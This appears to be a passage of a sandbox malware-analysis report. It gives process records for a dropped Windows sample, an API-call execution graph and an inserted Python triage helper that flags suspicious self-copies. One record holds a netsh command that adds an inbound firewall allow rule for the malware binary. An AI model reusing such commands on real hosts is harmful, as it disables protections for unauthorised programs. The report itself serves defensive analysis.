                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"
                                                                                                                                                                                                                                                                                          Imagebase:0x1200000
                                                                                                                                                                                                                                                                                          File size:82'432 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:18
                                                                                                                                                                                                                                                                                          Start time:06:41:43
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"
                                                                                                                                                                                                                                                                                          Imagebase:0x970000
                                                                                                                                                                                                                                                                                          File size:2'496'512 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:FA45B9C5E2A92B1B3D7D175C23FFC813
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                                                                                                                          Start time:06:41:45
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\sihost.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:sihost.exe
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff700bc0000
                                                                                                                                                                                                                                                                                          File size:111'616 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:A21E7719D73D0322E2E7D61802CB8F80
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                                                                                                          Start time:06:41:47
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff77afe0000
                                                                                                                                                                                                                                                                                          File size:55'320 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          Target ID:21
                                                                                                                                                                                                                                                                                          Start time:06:41:47
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService
Imagebase:0x7ff77afe0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:22
Start time:06:41:48
Start date:18/10/2024
Path:C:\Windows\System32\ctfmon.exe
Wow64 process (32bit):false
Commandline:"ctfmon.exe"
Imagebase:0x7ff7a3870000
File size:11'264 bytes
MD5 hash:B625C18E177D5BEB5A6F6432CCF46FB3
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:23
Start time:06:41:51
Start date:18/10/2024
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:C:\Windows\Explorer.EXE
Imagebase:0x7ff633410000
File size:5'141'208 bytes
MD5 hash:662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:24
Start time:06:41:56
Start date:18/10/2024
Path:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"
Imagebase:0x970000
File size:2'496'512 bytes
MD5 hash:FA45B9C5E2A92B1B3D7D175C23FFC813
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

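A small triage helper over the process list in this section, added here as an example; it is not part of the Joe Sandbox report or of Joe Sandbox itself. It parses the plain-text "Key:Value" process records and flags the processes an analyst would look at first: any whose MD5 equals the hash of the submitted sample (the malware relaunching a copy of itself from a new location, as the jvauyc32.exe record above shows with its WoW64 flag set), and any executable started from a user-writable profile directory. The two embedded records are copied from this section; the sample hash is supplied by the analyst from the report's General Information, and the list of "user-writable" directories is an assumption of this script.

```python
"""Triage helper for the Process records of a Joe Sandbox report.

Added example, not code from Joe Sandbox or from the report. Parses the
plain-text "Key:Value" records (blank-line separated) and flags processes
that look like the sample relaunching itself from a new location.
"""
import re
from dataclasses import dataclass

# Constructed input: two records copied from the process list above
# (explorer.exe, Target ID 23; the dropped jvauyc32.exe, Target ID 24).
SAMPLE_RECORDS = """\
Target ID:23
Start time:06:41:51
Start date:18/10/2024
Path:C:\\Windows\\explorer.exe
Wow64 process (32bit):false
Commandline:C:\\Windows\\Explorer.EXE
Imagebase:0x7ff633410000
File size:5'141'208 bytes
MD5 hash:662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:24
Start time:06:41:56
Start date:18/10/2024
Path:C:\\Users\\user\\AppData\\Roaming\\Z0BAZwxx\\jvauyc32.exe
Wow64 process (32bit):true
Commandline:"C:\\Users\\user\\AppData\\Roaming\\Z0BAZwxx\\jvauyc32.exe"
Imagebase:0x970000
File size:2'496'512 bytes
MD5 hash:FA45B9C5E2A92B1B3D7D175C23FFC813
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true
"""

# Assumption of this script: profile directories a standard user can write
# to without elevation. A fresh executable started from one of them is worth
# a look regardless of its hash.
USER_WRITABLE = re.compile(
    r"^[A-Za-z]:\\Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents)\\",
    re.IGNORECASE,
)


@dataclass
class ProcessRecord:
    target_id: int
    path: str
    commandline: str
    md5: str          # normalised to upper case
    wow64: bool       # 32-bit image running on the 64-bit sandbox
    file_size: int    # bytes; the report writes 2'496'512 with apostrophes
    has_exited: bool


def parse_records(text):
    """Split the report text into records and parse each Key:Value line.

    Only the first ':' separates key from value, so "Start time:06:41:51"
    and "Commandline:C:\\..." are handled correctly.
    """
    records = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in chunk.splitlines():
            key, sep, value = line.partition(":")
            if sep:
                fields[key.strip()] = value.strip()
        if "Target ID" not in fields:
            continue
        size = fields.get("File size", "0 bytes").split()[0].replace("'", "")
        records.append(ProcessRecord(
            target_id=int(fields["Target ID"]),
            path=fields.get("Path", ""),
            commandline=fields.get("Commandline", ""),
            md5=fields.get("MD5 hash", "").upper(),
            wow64=fields.get("Wow64 process (32bit)", "").lower() == "true",
            file_size=int(size),
            has_exited=fields.get("Has exited", "").lower() == "true",
        ))
    return records


def flag_self_copies(records, sample_md5):
    """Return (target_id, path, reasons) for processes that are probably the
    submitted sample under a new name, or binaries run from a profile dir."""
    sample_md5 = sample_md5.upper()
    flagged = []
    for r in records:
        reasons = []
        if r.md5 == sample_md5:
            reasons.append("MD5 identical to the submitted sample")
        if USER_WRITABLE.match(r.path):
            reasons.append("started from a user-writable profile directory")
        if reasons:
            flagged.append((r.target_id, r.path, reasons))
    return flagged


if __name__ == "__main__":
    # Hash as listed for the sample in the report's General Information.
    sample_hash = "FA45B9C5E2A92B1B3D7D175C23FFC813"
    for tid, path, reasons in flag_self_copies(parse_records(SAMPLE_RECORDS), sample_hash):
        print(f"Target {tid}: {path}")
        for why in reasons:
            print(f"  - {why}")
```

Matching on the MD5 catches a byte-identical self-copy only; a file infector that appends itself to other executables, or a dropper that re-packs its payload, will not share the hash, which is why the path heuristic is kept as a second, independent signal.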
Target ID:25
Start time:06:42:02
Start date:18/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
Imagebase:0x7ff77afe0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:28
Start time:06:42:05
Start date:18/10/2024
Path:C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
Imagebase:0x7ff663e30000
File size:793'416 bytes
MD5 hash:5CDDF06A40E89358807A2B9506F064D9
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:29
Start time:06:42:10
Start date:18/10/2024
Path:C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:0x7ff73df00000
File size:103'288 bytes
MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:30
Start time:06:42:11
Start date:18/10/2024
Path:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
Imagebase:0x7ff7df7f0000
File size:3'671'400 bytes
MD5 hash:5E1C9231F1F1DCBA168CA9F3227D9168
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:32
Start time:06:43:58
Start date:18/10/2024
Path:C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:0x7ff73df00000
File size:103'288 bytes
MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:33
Start time:06:44:06
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff73df00000
                                                                                                                                                                                                                                                                                          File size:103'288 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          Target ID:34
                                                                                                                                                                                                                                                                                          Start time:06:44:08
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\smartscreen.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\System32\smartscreen.exe -Embedding
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6d8c90000
                                                                                                                                                                                                                                                                                          File size:2'378'752 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:02FB7069B8D8426DC72C9D8A495AF55A
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:35
                                                                                                                                                                                                                                                                                          Start time:06:44:21
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\ApplicationFrameHost.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff674640000
                                                                                                                                                                                                                                                                                          File size:78'456 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:D58A8A987A8DAFAD9DC32A548CC061E7
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          Target ID:36
                                                                                                                                                                                                                                                                                          Start time:06:44:47
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff61dec0000
                                                                                                                                                                                                                                                                                          File size:19'456 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:6C44453CD661FC2DB18E4C09C4940399
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          Target ID:37
                                                                                                                                                                                                                                                                                          Start time:06:44:52
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff73df00000
                                                                                                                                                                                                                                                                                          File size:103'288 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          Target ID:38
                                                                                                                                                                                                                                                                                          Start time:06:44:53
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6668d0000
                                                                                                                                                                                                                                                                                          File size:19'232 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:F050189D49E17D0D340DE52E9E5B711F
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          Target ID:39
                                                                                                                                                                                                                                                                                          Start time:06:45:02
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff77afe0000
                                                                                                                                                                                                                                                                                          File size:55'320 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
Has exited: false

Target ID: 40
Start time: 06:45:07
Start date: 18/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0x4
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 41
Start time: 06:45:12
Start date: 18/10/2024
Path: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe"
Imagebase: 0xa90000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 42
Start time: 06:45:12
Start date: 18/10/2024
Path: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe"
Imagebase: 0xa90000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 43
Start time: 06:45:12
Start date: 18/10/2024
Path: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe"
Imagebase: 0xa90000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 44
Start time: 06:45:12
Start date: 18/10/2024
Path: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe"
Imagebase: 0xa90000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 45
Start time: 06:45:18
Start date: 18/10/2024
Path: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe"
Imagebase: 0xa90000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 46
Start time: 06:45:19
Start date: 18/10/2024
Path: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe"
Imagebase: 0xa90000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Execution Graph

Execution Coverage: 22.4%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 18.3%
Total number of Nodes: 1902
Total number of Limit Nodes: 56
                                                                                                                                                                                                                                                                                            execution_graph 9106 1438dc4 9107 1438dce RtlExitUserThread 9106->9107 9108 1437fca 9111 1437fd3 9108->9111 9109 14380e4 9110 14380e6 recv 9110->9109 9111->9109 9111->9110 9112 143809c select 9111->9112 9112->9109 9112->9110 9113 143b3c9 9114 143b3d3 9113->9114 9115 143b3db 9113->9115 9116 1434503 InterlockedExchange 9115->9116 9116->9114 9117 1438ec9 9118 1438ee2 9117->9118 9119 1438f47 9118->9119 9120 1438f2f lstrcpyn 9118->9120 9120->9119 9121 14408ce 9122 14408d8 9121->9122 9123 14408de GlobalFree 9122->9123 9124 14408ef RtlLeaveCriticalSection 9122->9124 9123->9124 9125 1440915 9124->9125 9126 144090a Sleep 9124->9126 9126->9125 8997 14bd440 8998 14bd760 8997->8998 9000 14bd765 8998->9000 9001 14bd78b LoadLibraryExA 9000->9001 9009 14bd778 9000->9009 9003 14bd9c0 7 API calls 9001->9003 9004 14bd83c 9003->9004 9028 14bd9c5 9004->9028 9007 14bd7cf GetModuleFileNameA 9011 14bd93f LoadLibraryExA GetProcAddress 9007->9011 9012 14bd9a0 Sleep 9007->9012 9008 14bd896 MapViewOfFile 9008->9007 9009->9007 9019 14bd9c0 9009->9019 9011->9012 9013 14bd96c CreateMutexA GetLastError 9011->9013 9014 14bd9ab ExitProcess 9012->9014 9013->9012 9013->9014 9016 14bd803 9018 14bd9c0 7 API calls 9016->9018 9018->9001 9020 14bd91a GetModuleFileNameA 9019->9020 9021 14bd9c4 9019->9021 9023 14bd93f LoadLibraryExA GetProcAddress 9020->9023 9024 14bd9a0 Sleep 9020->9024 9021->9016 9023->9024 9025 14bd96c CreateMutexA GetLastError 9023->9025 9026 14bd9ab ExitProcess 9024->9026 9025->9024 9025->9026 9029 14bd9c9 9028->9029 9029->9028 9029->9029 9030 14bd9cc GetProcAddress 9029->9030 9032 14bd853 SetErrorMode CreateFileMappingA CreateFileMappingA 9029->9032 9031 14bd9c0 7 API calls 9030->9031 9031->9029 
8214->8212 8214->8213 8215->7967 8217 143cc92 8216->8217 8220 143ccf8 8216->8220 8217->8220 8245 14344cb InterlockedExchange 8217->8245 8219 143ccc0 8219->8220 8246 14344cb InterlockedExchange 8219->8246 8220->7968 8222 14344cb InterlockedExchange 8220->8222 8222->7976 8223->7984 8224->7984 8225->7988 8226->7980 8227->7989 8228->7992 8247 14344cb InterlockedExchange 8229->8247 8231 143b366 8248 14344cb InterlockedExchange 8231->8248 8233 143b37b 8234 143b38d GetTickCount 8233->8234 8235 143b39c 8233->8235 8234->8235 8236 143c76b InterlockedExchange 8235->8236 8237 143b3b7 8236->8237 8237->7997 8238->7999 8239->8006 8240->8006 8241->8013 8242->8013 8243->8207 8244->8214 8245->8219 8246->8219 8247->8231 8248->8233 8250 143b64a 8249->8250 8251 143b3ef InterlockedExchange 8250->8251 8252 143b67b 8251->8252 8344 14344cb InterlockedExchange 8252->8344 8255 143ba0a 8257 143b3ef InterlockedExchange 8255->8257 8256 14344cb InterlockedExchange 8298 143b68b 8256->8298 8258 143ba31 8257->8258 8259 143ba46 8258->8259 8262 143be04 8258->8262 8348 14344cb InterlockedExchange 8259->8348 8261 143ba4b 8264 143bd22 8261->8264 8265 143bb06 8261->8265 8266 143ba75 8261->8266 8281 143bcb3 8261->8281 8295 143badc 8261->8295 8262->8295 8354 14344cb InterlockedExchange 8262->8354 8263 143b913 8263->8255 8346 14344cb InterlockedExchange 8263->8346 8270 143bd28 8264->8270 8271 143bd5f 8264->8271 8267 143b354 2 API calls 8265->8267 8278 143b3ef InterlockedExchange 8266->8278 8272 143bb1a 8267->8272 8268 143bf63 8268->8029 8275 143bfb2 2 API calls 8270->8275 8276 143bd68 8271->8276 8277 143bd7f 8271->8277 8279 143b3ef InterlockedExchange 8272->8279 8273 143b3ef InterlockedExchange 8273->8268 8275->8295 8352 14344cb InterlockedExchange 8276->8352 8353 14344cb InterlockedExchange 8277->8353 8278->8295 8284 143bb3a 8279->8284 8280 143b995 8293 143b9d5 8280->8293 8347 14344cb InterlockedExchange 8280->8347 8281->8295 8351 14344cb InterlockedExchange 8281->8351 8288 143bb85 8284->8288 8289 143bb4b 
8284->8289 8286 143bd6d 8297 143b3ef InterlockedExchange 8286->8297 8287 143b75e 8345 14344cb InterlockedExchange 8287->8345 8350 14344cb InterlockedExchange 8288->8350 8349 14344cb InterlockedExchange 8289->8349 8290 1434503 InterlockedExchange 8290->8298 8296 143b614 2 API calls 8293->8296 8295->8268 8295->8273 8296->8255 8297->8295 8298->8256 8298->8287 8298->8290 8300 143b3ef InterlockedExchange 8299->8300 8301 143bffe 8300->8301 8355 14344cb InterlockedExchange 8301->8355 8303 143b3ef InterlockedExchange 8304 143c136 8303->8304 8311 143c1b8 8304->8311 8358 14344cb InterlockedExchange 8304->8358 8306 143c00e 8327 143c10f 8306->8327 8356 14344cb InterlockedExchange 8306->8356 8307 143c18a 8309 143c2a3 8307->8309 8310 143c1f2 8307->8310 8307->8311 8312 143b354 2 API calls 8309->8312 8317 143b3ef InterlockedExchange 8310->8317 8313 143b3ef InterlockedExchange 8311->8313 8318 143c40e 8311->8318 8314 143c2b7 8312->8314 8313->8318 8319 143b3ef InterlockedExchange 8314->8319 8315 143c092 8321 143c0da 8315->8321 8357 14344cb InterlockedExchange 8315->8357 8317->8311 8318->8029 8320 143c2d7 8319->8320 8322 143c322 8320->8322 8323 143c2e8 8320->8323 8324 143bfb2 2 API calls 8321->8324 8360 14344cb InterlockedExchange 8322->8360 8359 14344cb InterlockedExchange 8323->8359 8324->8327 8327->8303 8329 143b3ef InterlockedExchange 8328->8329 8330 143c490 8329->8330 8338 143c4bc 8330->8338 8361 14344cb InterlockedExchange 8330->8361 8332 143c4aa 8333 143b354 2 API calls 8332->8333 8332->8338 8335 143c4f6 8333->8335 8334 143c60a 8334->8029 8362 14344cb InterlockedExchange 8335->8362 8337 143b3ef InterlockedExchange 8337->8334 8338->8334 8338->8337 8340 143b3ef InterlockedExchange 8339->8340 8341 143c653 8340->8341 8342 143b3ef InterlockedExchange 8341->8342 8343 143c759 8341->8343 8342->8343 8343->8029 8344->8298 8345->8263 8346->8280 8347->8280 8348->8261 8349->8295 8350->8295 8351->8295 8352->8286 8353->8286 8354->8295 8355->8306 8356->8315 8357->8315 8358->8307 8359->8311 
